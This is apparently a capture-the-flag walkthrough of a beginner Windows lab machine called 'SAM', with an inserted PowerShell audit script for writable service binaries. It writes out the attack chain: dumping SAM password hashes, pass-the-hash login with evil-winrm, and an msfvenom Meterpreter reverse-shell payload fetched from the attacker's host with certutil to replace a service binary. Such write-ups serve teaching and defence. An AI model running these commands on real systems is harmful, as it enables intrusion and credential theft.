Premise
In this walkthrough, we demonstrated basic Windows privilege escalation by replacing a service executable with our own payload. We also demonstrated the retrieval of Windows password hashes from the SAM file.
Machine Name: SAM
Difficulty: Beginner
Skills Learned
- Windows Privilege Escalation
- Services exploitation
Finding a Way In
My first step was to run an Nmap scan to see what services were running. I found that SMB and RDP were open, but there was no web server, FTP, or SSH. This narrowed down my options, so I decided to focus on the SMB shares.
I used the `smbclient` command to list the available shares and found one called “backups.” I mounted this share and discovered that it contained a dump of the entire C drive. This is not something you’d typically see in a real-world scenario, but it made my job a lot easier!
With access to the file system, I navigated to the `C:\Windows\System32\config` directory and used a tool called `samdump2` to extract the password hashes from the SAM file. I found a hash for a user named “jamie,” which I then used to log in with a tool called `evil-winrm`. This gave me a PowerShell session on the machine, but I was still just a regular user.
Becoming the Admin
Now that I had a shell, my next goal was to become the administrator. I started by enumerating the services running on the machine and found a couple of interesting ones called “Monitor One” and “Monitor Two.” I used the `icacls` command to check the permissions on the `monitor2.exe` binary and discovered that the “Users” group had full control over it. This meant that I could replace the legitimate `monitor2.exe` with a malicious payload of my own.
I used `msfvenom` to create a Windows Meterpreter reverse TCP payload and named it `monitor2.exe`. I then set up a Python web server on my machine to host the payload and used `certutil` on the target machine to download it.
With my malicious payload in place, all that was left to do was restart the “Monitor Two” service. I used the `sc stop` and `sc start` commands to do this, and as soon as the service started, it executed my payload and gave me a Meterpreter session with full administrator privileges! 👑
Even though I ran into some issues with the Meterpreter session being unstable, the core concept of exploiting a writable service to escalate privileges is a valuable one to know.
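Seen from the defender's side, the weakness above is a service binary that a low-privileged group can overwrite. The following PowerShell audit script is an added example, not code from the original post; it lists every installed service whose binary grants write-type rights to such a group. It assumes an elevated session so all ACLs are readable, and the principal list and rights mask are my own choices.

```powershell
# Added example (not part of the original post): audit every installed
# service's binary for write access granted to low-privileged principals,
# the misconfiguration the walkthrough found on monitor2.exe with icacls.
# Assumption: run from an elevated PowerShell session so every ACL is readable.

$lowPrivPrincipals = @(
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a caller overwrite, replace or re-permission the file.
# Read-type bits and Synchronize are deliberately left out so that the
# usual "ReadAndExecute, Synchronize" ACEs do not produce a finding.
$writeRights = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName is either quoted ("C:\Program Files\x.exe" -arg)
    # or bare (C:\services\monitor2.exe -arg). Unquoted paths that contain
    # spaces are a separate weakness and are not resolved here.
    if ($PathName -match '^"([^"]+)"')  { return $Matches[1] }
    if ($PathName -match '^(\S+\.exe)') { return $Matches[1] }
    return $null
}

function Find-WritableServiceBinary {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
        $acl = Get-Acl -LiteralPath $exe
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.IdentityReference.Value -notin $lowPrivPrincipals) { continue }
            if (($ace.FileSystemRights -band $writeRights) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName   # LocalSystem: a writable binary is a full compromise
                Binary    = $exe
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```

A hit on a service that runs as LocalSystem is exactly the condition exploited above; the fix is to tighten the file ACL (for example `icacls <path> /remove BUILTIN\Users`) so only administrators and SYSTEM can modify the binary.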
Commands I Used
Here are some of the key commands I used during this process:
- Listing SMB shares: `smbclient -L //172.31.1.12`
- Mounting an SMB share: `sudo mount -t cifs //172.31.1.12/backups /mnt/sam -o username=admin,password=`
- Dumping SAM hashes: `samdump2 SYSTEM SAM > sam_hashes.txt`
- Logging in with `evil-winrm`: `ruby evil-winrm.rb -i 172.31.1.12 -u jamie -H <NTLM_HASH>`
- Checking file permissions: `icacls C:\services\monitor2.exe`
- Generating a payload with `msfvenom`: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o monitor2.exe`
- Starting a Python web server: `python -m http.server 8000`
- Downloading a file with `certutil`: `certutil.exe -urlcache -f http://10.10.0.12:8000/monitor2.exe monitor2.exe`
- Stopping and starting a service: `sc stop monitor2` and `sc start monitor2`